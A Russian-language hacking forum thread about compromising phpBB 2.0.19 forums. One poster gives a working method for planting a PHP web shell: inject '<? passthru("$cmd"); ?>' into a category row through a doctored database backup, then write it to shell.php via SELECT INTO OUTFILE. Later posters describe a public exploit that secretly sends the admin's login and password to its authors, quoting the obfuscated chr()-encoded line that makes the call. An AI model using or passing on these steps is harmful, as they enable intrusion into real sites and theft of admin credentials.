А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html

Пробовал, но команды не выполняются, не знаю почему...

кинь сцылку в пм, посмотрим что к чему

Блин, я шелл в 2.0.19 делал так... заходил в админку, сохранял БД на винт, искал там вот таку строку:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
потом заменял на
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; (после этой строки поставь ещё один Enter). Сохранял файл... и восстанавливал БД. После вот по этому
home/test2.ru/www/phpbb/images/avatars/shell.php у меня был шелл. НУ а дальше сам!

Dr.Check
Я так тоже делал на локалхосте, всё легко, так как ты знаеш полный путь к форуму
home/test2.ru/www/phpbb
А как ты собираешся его узнать на чужом серваке?

А ты сплойт подправил? Там ids маячок стоит....

А разве это как-то сказывается на его работе?
На локалхосте работал, а чтоб поправить не хватает заний перла... жаль

Кроме того что пароль и логин админа домой уходят никак ))))

Всмысле домой - к рст?
Как почистить сплоит? Помогите
Могу просто удалить строчку
$xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?='.$ids);
Но будет ли он работать, а то тут что-то зашифровали
Работает в младших версиях, у меня открывает пустую страницу